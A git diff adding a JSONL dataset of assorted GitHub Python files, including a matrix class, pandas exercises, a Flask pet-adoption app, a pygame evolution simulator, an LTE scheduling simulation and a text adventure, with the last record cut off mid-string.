diff --git "a/3888.jsonl" "b/3888.jsonl" new file mode 100644--- /dev/null +++ "b/3888.jsonl" @@ -0,0 +1,663 @@ +{"seq_id":"70109098157","text":"import copy\n\n\nclass MatrixSizeError(Exception):\n pass\n\n\nclass Matrix:\n # Part 1\n def __init__(self, matrix):\n self.matrix = copy.deepcopy(matrix)\n\n def __str__(self):\n return '\\n'.join('\\t'.join(map(str, row)) for row in self.matrix)\n\n # Part 2\n def __eq__(self, other):\n if isinstance(other, Matrix):\n if len(self.matrix) != len(other.matrix):\n return False\n elif len(self.matrix) == 0:\n return True\n elif len(self.matrix[0]) != len(other.matrix[0]):\n return False\n else:\n if len(self.matrix) == \\\n sum([1 for i, j in zip(self.matrix, other.matrix) if i == j]):\n return True\n else:\n return False\n else:\n raise TypeError\n\n def size(self):\n if len(self.matrix) == 0:\n return 0, 0\n else:\n return len(self.matrix), len(self.matrix[0])\n\n # Part 3\n def __add__(self, other):\n # return self + other\n if isinstance(other, Matrix):\n if self.size() != other.size():\n raise MatrixSizeError\n else:\n return Matrix([[self.matrix[i][j] + other.matrix[i][j]\n for j in range(len(self.matrix[0]))]\n for i in range(len(self.matrix))])\n else:\n raise TypeError\n\n def __sub__(self, other):\n # return self - other\n if isinstance(other, Matrix):\n if self.size() != other.size():\n raise MatrixSizeError\n else:\n return Matrix([[self.matrix[i][j] - other.matrix[i][j]\n for j in range(len(self.matrix[0]))]\n for i in range(len(self.matrix))])\n else:\n raise TypeError\n\n # Part 4\n def __mul__(self, other):\n # return self * other\n if isinstance(other, Matrix):\n a_size = self.size()\n b_size = other.size()\n if a_size[1] != b_size[0]:\n raise MatrixSizeError\n elif a_size == (0, 0):\n return Matrix(other.matrix)\n elif b_size == (0, 0):\n return Matrix(self.matrix)\n else:\n return Matrix([[sum(a*b for a, b in zip(X_row, Y_col))\n for Y_col in zip(*other.matrix)]\n for X_row in self.matrix])\n else:\n raise TypeError\n\n # Part 5\n def transpose(self):\n if self.size == (0, 0):\n return Matrix([])\n else:\n return Matrix([[self.matrix[j][i] for j in range(len(self.matrix))]\n for i in range(len(self.matrix[0]))])\n\n # Part 6\n def tr(self):\n pass\n\n def det(self):\n pass\n","repo_name":"crypto-cat2008/SM_HSE_Python_Algo_Data_Structures","sub_path":"APw5Matrix.py","file_name":"APw5Matrix.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"6063853808","text":"import numpy as np\nimport pandas as pd\n\nvoivoideships_data_source = {\n 'dolnosląskie': {\n 'nr rejestru': 2,\n 'miasto wojewódzkie': 'Wrocław',\n 'powierzchnia [km2]': 19946.70,\n 'ludność': 2904198\n },\n 'kujawsko-pomorskie': {\n 'nr rejestru': 4,\n 'miasto wojewódzkie': 'Bydgoszcz / Toruń',\n 'powierzchnia [km2]': 17971.34,\n 'ludność': 2086210\n },\n 'lubelskie': {\n 'nr rejestru': 6,\n 'miasto wojewódzkie': 'Lublin',\n 'powierzchnia [km2]': 25122.46,\n 'ludność': 2139726\n },\n 'lubuskie': {\n 'nr rejestru': 8,\n 'miasto wojewódzkie': 'Gorzów Wielkopolski / Zielona Góra',\n 'powierzchnia [km2]': 13987.93,\n 'ludność': 1018084\n },\n 'łódzkie': {\n 'nr rejestru': 10,\n 'miasto wojewódzkie': 'Łódź',\n 'powierzchnia [km2]': 18218.95,\n 'ludność': 2493603\n },\n 'małopolskie': {\n 'nr rejestru': 12,\n 'miasto wojewódzkie': 'Kraków',\n 'powierzchnia [km2]': 15182.79,\n 'ludność': 3372618\n },\n 'mazowieckie': {\n 'nr rejestru': 14,\n 'miasto wojewódzkie': 'Warszawa',\n 'powierzchnia [km2]': 35558.47,\n 'ludność': 5349114\n },\n}\n# 4\nvoivoideships = pd.DataFrame.from_dict(voivoideships_data_source, orient='index')\n\n# 4.1\nprint(\"4.1. Small cities\")\nsmall_cities = voivoideships['powierzchnia [km2]'] < 20000\nprint(voivoideships.loc[small_cities, ['miasto wojewódzkie']])\n\n# 4.2\nprint(\"4.2. Cities with biggest population\")\ncities_with_biggest_population = pd.DataFrame.from_records(voivoideships[voivoideships['ludność'] > 2000000])\nprint(cities_with_biggest_population)\n\n# 4.3\nprint('4.3. New row')\nwielkopolska = [30, 'Poznań', 29826.50, 3475323]\nvoivoideships.loc['wielkopolska'] = wielkopolska\nprint(voivoideships)\n\n# 4.4\nprint('4.4. Sort by population')\nprint(voivoideships.sort_values(by='ludność', ascending=False))\n\n# 4.5\nprint('4.5. Reordering')\nvoivoideships = voivoideships[['nr rejestru', 'powierzchnia [km2]', 'ludność', 'miasto wojewódzkie']]\nprint(voivoideships)\n\n# 4.6\nprint('4.6. Capitalized')\nvoivoideships.index = voivoideships.index.str.capitalize()\nprint(voivoideships)\n\n# 4.7\nprint('4.7. Series with index and boolean')\nindex_and_boolean = pd.Series((voivoideships['ludność'] / voivoideships['powierzchnia [km2]']) > 140,\n index=voivoideships.index)\nprint(index_and_boolean)\n\n# 4.8\nprint('4.8. Delete row')\nvoivoideships.drop(['Lubuskie'], axis=0, inplace=True)\nprint(voivoideships)\n\n# 4.9\nprint('4.9. describe()')\nprint(voivoideships.describe())\n","repo_name":"Jaclawiciel/Analiza-i-przetwarzanie-danych-w-Python","sub_path":"Zajęcia 3 - Biblioteki NumPy i Pandas/4. Pandas DataFrame.py","file_name":"4. Pandas DataFrame.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5954147460","text":"from sys import maxsize\n\nfrom py_stringsimjoin.filter.filter_utils import get_prefix_length\nfrom py_stringsimjoin.index.index import Index\nfrom py_stringsimjoin.utils.token_ordering import order_using_token_ordering\n\n\nclass PositionIndex(Index):\n \"\"\"Builds a position index on the input column in the input table. \n \n Position index is used by position filter, dice join, cosine join and \n jaccard join. \n \"\"\" \n\n def __init__(self, table, index_attr, tokenizer, \n sim_measure_type, threshold, token_ordering):\n self.table = table\n self.index_attr = index_attr\n self.tokenizer = tokenizer\n self.sim_measure_type = sim_measure_type\n self.threshold = threshold\n self.token_ordering = token_ordering\n self.index = None\n self.size_cache = None\n self.min_length = maxsize\n self.max_length = 0\n super(self.__class__, self).__init__()\n\n def build(self, cache_empty_records=True, cache_tokens=False):\n \"\"\"Build position index.\"\"\"\n self.index = {}\n self.size_cache = []\n cached_tokens = []\n empty_records = []\n row_id = 0\n for row in self.table:\n # tokenize string and order the tokens using the token ordering \n index_string = row[self.index_attr]\n index_attr_tokens = order_using_token_ordering(\n self.tokenizer.tokenize(index_string), self.token_ordering)\n\n # compute prefix length\n num_tokens = len(index_attr_tokens)\n prefix_length = get_prefix_length(\n num_tokens,\n self.sim_measure_type, self.threshold,\n self.tokenizer)\n\n # update the index\n pos = 0\n for token in index_attr_tokens[0:prefix_length]:\n if self.index.get(token) is None:\n self.index[token] = []\n self.index.get(token).append((row_id, pos))\n pos += 1\n\n self.size_cache.append(num_tokens)\n\n # keep track of the max size and min size.\n if num_tokens < self.min_length:\n self.min_length = num_tokens\n\n if num_tokens > self.max_length:\n self.max_length = num_tokens\n\n # if cache_tokens flag is set to True, the store the tokens. \n if cache_tokens:\n cached_tokens.append(index_attr_tokens)\n\n if cache_empty_records and num_tokens == 0:\n empty_records.append(row_id)\n\n row_id += 1 \n\n return {'cached_tokens' : cached_tokens,\n 'empty_records' : empty_records}\n\n def probe(self, token):\n \"\"\"Probe position index using the input token.\"\"\"\n return self.index.get(token, [])\n\n def get_size(self, row_id):\n return self.size_cache[row_id]\n","repo_name":"anhaidgroup/py_stringsimjoin","sub_path":"py_stringsimjoin/index/position_index.py","file_name":"position_index.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"73"} +{"seq_id":"71571059115","text":"from monkeytest import *\n\n\nif __name__==\"__main__\":\n file_path = os.path.abspath(\"monkeyconfig.xls\")\n systemkind=input(\"请输入你要测试的系统(其中1代表国网系统,2代表gcloud系统):\") #手动输入你要测试的系统代表值\n configs=Readconfig(file_path,systemkind).configs\n monkeytest=Monkeytest(configs)\n proxy=monkeytest.get_proxy()\n driver=monkeytest.get_driver(proxy)\n proxy.new_har(\"douyin\", options={'captureHeaders': True, 'captureContent': True})\n monkeytest.login(driver)\n monkeytest.autoclick(driver,int(configs['clickcount']))\n result = proxy.har\n now_time = datetime.now(tz=pytz.timezone(\"Asia/Shanghai\")).strftime(\"%Y-%m-%d_%H-%M-%S\")\n \n if systemkind=='1': #根据你输入的系统代表值去定义测试报告中sheet名称 \n sheet_name='国网系统'\n elif systemkind=='2':\n sheet_name='gcloud系统'\n else:\n sheet_name='其他'\n reportfile_path=str('report/')\n report=Savereport(reportfile_path+now_time+ \".xlsX\",sheet_name)\n bold=report.set_sheet_style(sheet_name) \n set_sheet_title(report,bold,sheet_name)\n\n parse_result(result,report,bold,sheet_name)\n report.close_excel() \n server.stop\n print(\"测试完毕\")","repo_name":"yao0013/monkeytest_tool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"36831369028","text":"#!/usr/bin/python\n\n# 统计命令行参数指定目录下全体文件字符频数\n\nimport os\nimport sys\n\n\ndef update_dict(l, d):\n new_d = d\n for c in l:\n new_d[c] = new_d.get(c, 0) + 1\n return new_d\n\n\ndirs = os.listdir(sys.argv[1])\nos.chdir(sys.argv[1])\nfreq = dict()\nfor file in dirs:\n fin = open(file)\n for line in fin:\n freq = update_dict(line, freq)\nsorted_freq = sorted(freq.items(), key=lambda d: d[1])\nprint(\"字符频数(升序):\")\nprint(sorted_freq)\n","repo_name":"KofClubs/FSW-Temperature-Field-Compressor","sub_path":"scripts/char_counter.py","file_name":"char_counter.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"26419578687","text":"from flask import Flask, request, render_template, flash, redirect, jsonify\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom model import db, connect_db, Pet\nfrom form import AddPetForm, EditPetForm\n\napp=Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///pet_shop_test'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SECRET_KEY'] = \"secret\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS']=False\ntoolbar = DebugToolbarExtension(app)\n\nconnect_db(app)\n\n@app.route('/')\ndef home():\n pet=Pet.query.all()\n return render_template('home.html',pet=pet)\n\n@app.route('/add', methods=['GET','POST'])\ndef add_pet():\n form=AddPetForm()\n if form.validate_on_submit():\n name=form.pet_name.data\n species=form.species.data\n photo_url=form.photo_url.data\n age=form.age.data\n note=form.note.data\n\n pet=Pet(name=name, species=species, photo_url=photo_url,age=age, notes=note)\n db.session.add(pet)\n db.session.commit()\n flash(f\"{pet.name} added.\")\n return redirect('/')\n else:\n return render_template('add_pet_form.html',form=form)\n\n@app.route('/', methods=['GET', 'POST'])\ndef edit_pet(pet_id):\n pet=Pet.query.get_or_404(pet_id)\n form= EditPetForm(obj=pet)\n\n if form.validate_on_submit():\n pet.note=form.note.data\n pet.available=form.available.data\n pet.photo_url=form.photo_url.data\n db.session.commit()\n flash(f\"{pet.name} updated.\")\n return redirect('/')\n else:\n\n return render_template('edit_pet_form.html',form=form, pet=pet)\n# \"\"\"return pet info in jason format\"\"\"\n@app.route(\"/api/pets/\", methods=['GET'])\ndef api_get_pet(pet_id):\n \"\"\"Return basic info about pet in JSON.\"\"\"\n\n pet = Pet.query.get_or_404(pet_id)\n info = {\"name\": pet.name, \"age\": pet.age}\n\n return jsonify(info)","repo_name":"azhm65ptk/pet_adoption_agency","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4975267212","text":"class Account:\n def __init__(self, owner, balance=0):\n self.owner = owner\n self.balance = balance\n\n def __str__(self):\n return f'Account owner:{self.owner}\\nAccount balance: ${self.balance}'\n\n def deposit(self, dep_amt):\n self.balance += dep_amt\n print(f'${dep_amt} Deposit Accepted')\n\n def withdraw(self, wd_amt):\n if self.balance >= wd_amt:\n self.balance -= wd_amt\n print(f'${wd_amt} Withdrawal Accepted')\n else:\n print('Funds Unavailable!')\n\n\nacct1 = Account('Shri',800)\nprint(acct1)\nacct1.deposit(200)\nacct1.withdraw(500)\nprint(f'Current balance :{acct1.balance}')","repo_name":"shrinath770/shri_repository","sub_path":"A My Practice/PycharmProjects/Python_Practice/ass7.py","file_name":"ass7.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33967422707","text":"import pygame, sys , random , math\r\npygame.init()\r\n#OPTIONS________________________________________________________________________________________________________________\r\n#JUNGLE\r\nsettings = input('own / default')\r\n\r\nif settings == 'default' or settings == 'd':\r\n jx = 250\r\n jy = 1300\r\n a_count = 10\r\n food_time = 10\r\n food_j = 2\r\n food_p = 1\r\n energy_time = 20\r\n energy_take = 2\r\n energy_start = 30\r\n energy_add = 10\r\n energy_to_copulation = 60\r\n speed = 20\r\n\r\nif settings == 'own':\r\n jy = int(input(\"Jungle height\"))\r\n jx = int(input('Jungle width'))\r\n if int(jy) > 900:\r\n while int(jy) > 900:\r\n jy = int(input(\"jungle height value is too big max = 900\"))\r\n\r\n if int(jx) > 1300:\r\n while int(jx) > 1300:\r\n jx = int(input(\"jungle width value is too big max = 1300\"))\r\n\r\n #ANIMALS\r\n a_count = int(input('How many animals at the beginning'))\r\n speed = int(input('Animal Speed'))\r\n\r\n #FOOD\r\n food_time = int(input(\"Create food in seconds\"))\r\n food_j = int(input('How many food in jungle per second'))\r\n food_p = int(input('How many food in plains per second'))\r\n\r\n #ENERGY\r\n energy_time = int(input('How many seconds to take energy'))\r\n energy_take = int(input('How many energy to take'))\r\n energy_start = int(input('How much energy at the beginning'))\r\n energy_add = int(input('How much energy to add by eating the plant'))\r\n energy_to_copulation= int(input('Minimal value of energy to copulation'))\r\n#VARIABLE_______________________________________________________________________________________________________________\r\n#FPS\r\nmax_fps = 1\r\nclock = pygame.time.Clock()\r\ndelta = 0.0\r\n\r\n#ANIMALS\r\nanim = []\r\n\r\n#FOOD\r\nfood_jun = []\r\nfood_pla = []\r\n\r\n#SCREEN\r\nscreen = pygame.display.set_mode((1600,900))\r\n\r\n#POINT JUNLE\r\n\r\npj_x = (1900 - (jx))/2\r\npj_y = (900 - (jy))/2\r\n\r\n#Time\r\ntime = 0\r\ntime_energy = 0\r\n\r\n\r\n#FUNCTIONS______________________________________________________________________________________________________________\r\n\r\n#FOOD ADD\r\ndef food_add():\r\n for f in range(0,(food_j)):\r\n food_jun.append([random.randint ((pj_x), (pj_x) + (jx)), random.randint((pj_y), (pj_y) + (jy))])\r\n\r\n for f in range(0,(food_p)):\r\n food_pla.append([random.randint(330,1600),random.randint(0,900)])\r\n\r\ndef food_print():\r\n for i in range(0,len(food_jun)):\r\n pygame.draw.rect(screen, (184, 186, 86), (food_jun[i][0], food_jun[i][1], 12 , 12))\r\n for f in range(0,len(food_pla)):\r\n pygame.draw.rect(screen, (10, 171, 131), (food_pla[f][0], food_pla[f][1], 12, 12))\r\n\r\n\r\n#ANIM ADD\r\nfor a in range(0,int(a_count)):\r\n anim.append([random.randint(320, 1580),random.randint(20, 880),(energy_start),0])\r\n\r\ndef anim_print():\r\n for a in anim:\r\n\r\n if a[2] < energy_start*0.5:\r\n pygame.draw.rect(screen, (222, 64, 64), (a[0], a[1], 20, 20))\r\n elif a[2] < energy_start:\r\n pygame.draw.rect(screen, (173, 23, 23), (a[0], a[1], 20, 20))\r\n elif a[2] < energy_start * 1.5:\r\n pygame.draw.rect(screen, (112, 8, 8), (a[0], a[1], 20, 20))\r\n elif a[2] < energy_start * 2:\r\n pygame.draw.rect(screen, (82, 2, 2), (a[0], a[1], 20, 20))\r\n else:\r\n pygame.draw.rect(screen, (140, 13, 13), (a[0], a[1], 20, 20))\r\n\r\ndef anim_move():\r\n for i in range(len(anim)):\r\n move = random.randint(0,3)\r\n if anim[i][1] >= 860:\r\n anim[i][1] -= 20\r\n if anim[i][1] <= 40:\r\n anim[i][1] += 20\r\n if anim[i][0] <= 340:\r\n anim[i][0] += 20\r\n if anim[i][0] >= 1560:\r\n anim[i][0] -= 20\r\n\r\n if move == 0:\r\n anim[i][0] -=speed\r\n if move == 1:\r\n anim[i][0] +=speed\r\n if move == 2:\r\n anim[i][1] -=speed\r\n if move == 3:\r\n anim[i][1] +=speed\r\n\r\ndef fast():\r\n global max_fps\r\n mx,my= pygame.mouse.get_pos()\r\n if mx >= 25 and mx <= 275 and my >= 835 and my <= 875:\r\n pygame.draw.rect(screen, (10, 10, 10), (mx, 850, 15, 15))\r\n max_fps = float(mx-24)\r\n\r\ndef pokrywaja_sie(box1,box2):\r\n\r\n srodek_1_x = box1.x + box1.width/2\r\n srodek_2_x = box2.x + box2.width / 2\r\n srodek_1_y = box1.y + box1.height / 2\r\n srodek_2_y = box2.y + box2.height / 2\r\n\r\n r_1 = box1.width/2\r\n r_2 = box2.width/2\r\n\r\n odleglos = math.sqrt((srodek_2_x - srodek_1_x)**2 + (srodek_1_y - srodek_2_y)**2)\r\n if odleglos > r_1 + r_2:\r\n return False\r\n return True\r\n\r\ndef anim_ded():\r\n for animal in anim:\r\n\r\n if animal[2] <= 0:\r\n anim.remove(animal)\r\n\r\ndef chart():\r\n pygame.draw.rect(screen, (55, 163, 16), (250, 10, 5, 5))\r\n\r\ndef click():\r\n mx, my = pygame.mouse.get_pos()\r\n for o in anim:\r\n if keys[pygame.K_r]:\r\n if pokrywaja_sie(pygame.Rect((o[0]), (o[1]), 40, 40), pygame.Rect(mx, my, 45, 45)):\r\n print(o)\r\n\r\nfor i in range(50):\r\n food_add()\r\n\r\n#LOOP___________________________________________________________________________________________________________________\r\nwhile True:\r\n for i in pygame.event.get():\r\n if i.type == pygame.QUIT:\r\n sys.exit(0)\r\n#before the loop--------------------------------------------------------------------------------------------------------\r\n anim_ded()\r\n#FPS____________________________________________________________________________________________________________________\r\n delta += clock.tick() / 1000.0\r\n while delta > 1 / max_fps:\r\n delta -= 1 / max_fps\r\n\r\n#VARIABLE IN LOOP_______________________________________________________________________________________________________\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_c]:\r\n print(len(anim))\r\n\r\n\r\n click()\r\n for i,o in enumerate(food_jun):\r\n for a in anim:\r\n if pokrywaja_sie(pygame.Rect((o[0]), (o[1]), 15,15), pygame.Rect(a[0], a[1], 20, 20)):\r\n food_jun.pop(i)\r\n a[2] = a[2] + energy_add\r\n a[3] = a[3] + 1\r\n food_jun.append([random.randint((pj_x), (pj_x) + (jx)),random.randint((pj_y), (pj_y) + (jy))])\r\n\r\n for i,o in enumerate(food_pla):\r\n for a in anim:\r\n if pokrywaja_sie(pygame.Rect((o[0]), (o[1]), 15,15), pygame.Rect(a[0], a[1], 20, 20)):\r\n food_pla.pop(i)\r\n a[2] = a[2] + energy_add\r\n a[3] = a[3] + 1\r\n food_pla.append([random.randint((pj_x), (pj_x) + (jx)),random.randint((pj_y), (pj_y) + (jy))])\r\n\r\n for o in anim:\r\n for o2 in anim:\r\n if o != o2:\r\n if o[2] > energy_to_copulation and o2[2] > energy_to_copulation:\r\n if pokrywaja_sie(pygame.Rect((o[0]), (o[1]), 20, 20), pygame.Rect(o2[0], o2[1], 20, 20)):\r\n anim.append([random.randint(320, 1580), random.randint(20, 880), (energy_start), 0])\r\n o[2] /= 2\r\n o2[2] /= 2\r\n\r\n\r\n\r\n#DRAWING________________________________________________________________________________________________________________\r\n pygame.display.flip()\r\n screen.fill((107, 191, 94))\r\n\r\n #TERRAIN\r\n pygame.draw.rect(screen, (77, 151, 74), ( int((1900 - jx)/2) , int((900 - jy)/2) ,int(jx) ,int(jy)))\r\n pygame.draw.rect(screen, (230,230,230), (0,0,300,900))\r\n\r\n #FPS\r\n pygame.draw.rect(screen, (100,100,100), (25,850,250,15))\r\n fast()\r\n\r\n time += 1\r\n #FOOD\r\n if time == int(food_time):\r\n food_add()\r\n time = 0\r\n food_print()\r\n\r\n time_energy += 1\r\n if time_energy == int(energy_time):\r\n time_energy = 0\r\n for a in range(0, int(len(anim))):\r\n anim[a][2] = anim[a][2] - int(energy_take)\r\n\r\n #ANIMALS\r\n anim_print()\r\n anim_move()\r\n","repo_name":"Peokk/Virtual-Animal-Environment---Evolution-Simulator","sub_path":"Virtual Animal Environment.py","file_name":"Virtual Animal Environment.py","file_ext":"py","file_size_in_byte":8011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"86603387397","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_stf_selector\n----------------------------------\n\nTests for `selector` module.\n\"\"\"\n\nfrom mock import patch\nfrom stf_selector.stf import STF\nfrom stf_selector.query import where\nfrom stf_selector.selector import Selector\n\n\n@patch.object(STF, 'devices')\ndef test_find_without_cond(mock_devices, generate_data):\n \"\"\"\n test find method with no cond\n :return: len of devices\n \"\"\"\n mock_devices.return_value = generate_data\n s = Selector()\n s.load()\n s = s.find()\n assert s.count() == 9\n\n\n@patch.object(STF, 'devices')\ndef test_find_with_one_cond(mock_devices, generate_data):\n \"\"\"\n test find method with one cond\n\n :param cond: condition to filter devices.\n like : where(\"sdk\")==19 the details syntax\n See more at: http://\n :type cond: where\n :return: len of device\n \"\"\"\n mock_devices.return_value = generate_data\n s = Selector()\n s.load()\n\n cond = where(\"sdk\") == '19'\n s = s.find(cond=cond)\n assert s.count() == 2\n\n\n@patch.object(STF, 'devices')\ndef test_find_with_multi_conds(mock_devices, generate_data):\n \"\"\"\n test find method with multi cond\n\n condition to filter devices.\n there are two ways to do muitl filter\n Firstly:\n like : (where(\"sdk\")==19) & (where(\"manufacturer\") == 'OPPO')\n like : (where(\"sdk\")==19) | (where(\"manufacturer\") == 'OPPO')\n or like :((where(\"manufacturer\") == 'SAMSUNG') | (where(\"manufacturer\") == 'OPPO')) & (where(\"sdk\")==19)\n Secondly:\n s.find(cond=cond).find(cond=cond)\n or : s.find(cond=cond).find(cond=cond).find(...)\n See more at: http://\n :type : where\n :return: len of device\n \"\"\"\n mock_devices.return_value = generate_data\n s = Selector()\n s.load()\n\n # you can code like\n cond = ((where(\"manufacturer\") == 'SAMSUNG')\n | (where(\"manufacturer\") == 'OPPO')) \\\n & (where(\"sdk\") == '19')\n s = s.find(cond=cond)\n assert s.count() == 1\n","repo_name":"RedQA/stf-selector","sub_path":"tests/test_stf_selector.py","file_name":"test_stf_selector.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"73"} +{"seq_id":"1820416316","text":"import logging\nimport statistics\nfrom math import copysign, inf\n\nimport numpy.random as random\nfrom typing import List\nfrom ResourceBlock import ResourceBlock\nfrom User import User\n\n\ndef divide(a, b):\n if b == 0:\n return copysign(inf, b)\n else:\n return a / b\n\n\ndef generate_fucking_random_bigger_than_fucking_0_ffs(l: float) -> int:\n tmp = round(random.exponential(l))\n while tmp == 0:\n tmp = round(random.exponential(l))\n\n return tmp\n\n\nclass BTS:\n def __init__(self, k_: int, s_: int, epsilon_: float, clock_: int, simulation_time_: int, t1l: int, t2l: int,\n _log: logging):\n self.log: logging.Logger = _log.getChild(__name__)\n self.k: int = k_ # ilość Resource Blocks\n self.k_max: int = 3 # ilość ResourceBlocków do przydzielenie maksymalnie\n self.s: int = s_ # czas co ile przydzielane są bloki zasobów RB\n self.epsilon: float = epsilon_ # prawdopodobienstwo, że transmisja się nie uda\n self.tau: float = generate_fucking_random_bigger_than_fucking_0_ffs(\n 10) # odstęp czasowy między zmianą warunków propagacji dla każdego usera\n self.t1: int = t1l # generate_fucking_random_bigger_than_fucking_0_ffs(t1l)\n self.t2: int = t2l # generate_fucking_random_bigger_than_fucking_0_ffs(t2l)\n self.clock: int = clock_ # zegar BTSa (1 cykl = 1ms)\n self.cycles_done: int = 0 # wykonane cykle zegarowe przez BTS.\n self.taken_rb_count: int = 0 # ilość zajętych ResourceBlocków\n self.user_list: List[User] = list() # [User(_log=self.log, _rb=list()) for _ in range(15)]\n self.served_users: int = 0\n self.new_users: int = 0\n self.simulation_time: int = simulation_time_ * 1000\n self.avg_waittime: List[int] = list()\n self.data_sent: List[int] = list()\n self.data_retransmitted: List[int] = list()\n self.user_mean_data_sent: List[int] = list()\n self.user_mean_data_retransmitted: List[int] = list()\n self.correct_transmission = 0\n self.error_trasmission = 0\n self.initial_phase: bool = False\n self.initial_phase_cycles: int = None\n\n print(self.t1, self.t2, simulation_time_)\n\n self.log.log(msg='Created Base Transmitting Station', level=1)\n\n def run(self, step_by_step: bool):\n while self.simulation_time >= self.cycles_done:\n self.step()\n\n if step_by_step:\n if input('Press \"Enter\" to continue, \":q!\" then \"Enter\" to exit simulation...\\n') == ':q!':\n exit(0)\n\n def step(self):\n if not self.cycles_done % self.t1:\n self.add_user()\n self.log.log(msg='Added user with t1', level=1)\n\n if not self.cycles_done % self.t2:\n self.add_user()\n self.log.log(msg='Added user with t2', level=1)\n\n if not self.cycles_done % self.tau:\n self.update_users_throughput()\n self.log.log(msg='Updated users propagation conditions', level=1)\n\n if not self.cycles_done % self.s and self.user_list:\n self.redistribute_resource_blocks()\n self.log.log(msg='Updated users resource blocks', level=1)\n\n # tmp = list()\n # tmp2 = list()\n for user in self.user_list:\n tmp = list()\n tmp2 = list()\n if user.d > 0 and user.has_resource_blocks():\n for rb in user.user_rb_list:\n if rb.is_sent:\n user.d -= rb.throughput\n self.correct_transmission += 1\n tmp.append(rb.throughput)\n self.log.log(msg='Sent packet!', level=1)\n else:\n rb.update_is_sent()\n self.error_trasmission += 1\n tmp2.append(rb.throughput)\n self.log.log(msg='Packet updated!', level=2)\n\n user.throughputs.append(tmp if tmp else [0])\n user.retransmitted.append(tmp2 if tmp2 else [0])\n self.data_retransmitted.append(statistics.mean(tmp2 if tmp2 else [0]))\n self.data_sent.append(statistics.mean(tmp if tmp else [0]))\n user.update_prev_sum_d()\n\n if user.d <= 0:\n if self.initial_phase:\n self.avg_waittime.append(user.waittime)\n self.user_mean_data_sent.append(statistics.mean(statistics.mean(t) for t in user.throughputs if t))\n self.user_mean_data_retransmitted.append(statistics.mean([statistics.mean(r) for r in user.retransmitted if r]))\n self.remove_user(user)\n\n user.update_user_waittime()\n\n self.cycles_done += self.clock\n\n def add_user(self) -> None:\n self.user_list.append(User(_log=self.log, _rb=list()))\n self.new_users += 1\n\n self.log.log(msg='Added user to BTS!', level=1)\n\n def remove_user(self, user: User) -> None:\n # self.taken_rb_count -= len(user.user_rb_list)\n self.user_list.remove(user)\n self.served_users += 1\n\n self.log.log(msg='Removed user!', level=1)\n\n def update_users_throughput(self) -> None: # Update throughput of existing ResourceBlocks\n for user in self.user_list:\n user.update_user_existing_rbs()\n\n def redistribute_resource_blocks(self) -> None:\n for user in self.user_list:\n user.clear_resource_blocks()\n\n for i in range(len(self.user_list) * self.k_max if len(self.user_list) < self.k / self.k_max else self.k):\n value, user_index = max(\n ((divide(user.get_current_throughput(), user.get_avg_throughput()), user_index) for user_index, user in\n enumerate(self.user_list) if not user.has_all_resource_blocks()), key=lambda x: x[0])\n picked = self.user_list[user_index]\n\n picked.add_resource_block(ResourceBlock(_log=self.log, _epsilon=self.epsilon))\n\n if (i == self.k - 1 or self.cycles_done > 100) and not self.initial_phase:\n self.initial_phase = True\n self.initial_phase_cycles = self.cycles_done\n","repo_name":"loboda4450/symulacja_cyfrowa","sub_path":"BTS.py","file_name":"BTS.py","file_ext":"py","file_size_in_byte":6229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73063001515","text":"# Modify the program so that the exits is a dictionary rather than a list,\n# with the keys being the numbers of the locaitons and the values being \n# dictionaries holding the exits (as they do at present). No change should\n# be needed to the actual code.\n\n# Once that is working, creat another dictionary that contains words that\n# players may use. These words will be the keys, and their values will be\n# a single letter that the program can use to determine which way to go\n\n\n\nlocations = {\n 0: \"You are sitting in front of a computer learning Python\",\n 1: \"You are standing at the end of a road before a small brick building\",\n 2: \"You are at the top of a hill\",\n 3: \"You are inside a building, a well house for a small stream\",\n 4: \"You are in a valley beside a stream\",\n 5: \"You are in the forest\", \n}\n\nexits = {\n 0: {\"Q\": 0},\n 1: {\"W\": 2, \"E\": 3, \"S\": 4, \"N\": 5, \"Q\": 0},\n 2: {\"N\": 5, \"E\": 1, \"Q\": 0},\n 3: {\"W\": 1, \"Q\": 0,},\n 4: {\"W\": 2, \"N\": 1, \"Q\": 0},\n 5: {\"W\": 2, \"S\": 1, \"Q\": 0}, \n}\nwords = {\n \"WEST\": \"W\",\n \"EAST\": \"E\",\n \"NORTH\": \"N\",\n \"SOUTH\": \"S\",\n \"QUIT\": \"Q\"\n}\n\n\nloc = 1\nwhile True:\n print(locations[loc])\n available_exits = \", \".join(exits[loc].keys())\n \n if loc == 0:\n break\n \n direction = input(\"Available exits are \" + available_exits + \" \").upper()\n if direction in exits[loc]:\n loc = exits[loc][direction]\n elif direction in words.keys():\n direction = words[direction]\n loc = exits[loc][direction]\n else:\n print(\"Yoo mate, you can't go there 